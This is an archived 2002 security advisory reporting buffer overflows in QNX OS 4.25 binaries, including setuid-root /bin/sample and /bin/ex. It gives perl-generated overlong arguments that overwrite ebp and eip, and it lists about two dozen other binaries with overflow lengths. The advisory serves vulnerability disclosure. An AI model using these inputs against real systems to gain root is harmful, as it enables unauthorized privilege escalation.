17th Jun 2002 [SBWID-5459]
COMMAND
QnX multiples bof in suid/no suid files
SYSTEMS AFFECTED
QnX OS 4.25
PROBLEM
Egor Egorov founds the following binaries to be vulnerable to buffer
overflows :
/bin/sample
Example :
=========
# cd /bin
# ls -l sample
-rwsrwxr-x 1 root root 20639 Jan 19 1996 sample
# sample `perl -e \'print \"A\" x 280\'`
Profile based upon 2000 samples/second.
//1/bin/sample terminated (SIGSEGV) at 0005:00000041
%1 672 Memory fault sample $(perl -e \'print \"A\" x 280\')
# wd sample \'perl -e print \"A\" x 280\'`
ebp: 41414141
eip: 00000041
# wd sample \'perl -e \'print \"A\" x 280, \"B\"\'`
ebp: 41414141
eip: 00004241
/bin/ex
Example :
=========
# wd ex `perl -e \'print \"AAA\" x 420, \"good\", \"CCC\" x 280\'`
ebp: 00000041
eip: 646f6f67 - doog
And also :
file bytes for bof
/bin/du - 558
/bin/find - 799
/bin/lex - 1673
/bin/mkdir - 517
/bin/rm - 351
/bin/serserv - 224
/bin/tcpserv - 146
/bin/termdef - 729
/bin/time - 2489
/bin/unzip - 299
/bin/use - 1964
/bin/wcc - 138
/bin/wcc386 - 137
/bin/wd -
/bin/wdisasm - 135
/bin/which - 304
/bin/wlib - 256
/bin/wlink - 10244
/bin/wpp - 256
/bin/wpp386 - 256
/bin/wprof - 141
/bin/write - 157
/bin/wstrip - 817
SOLUTION
Update ?
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
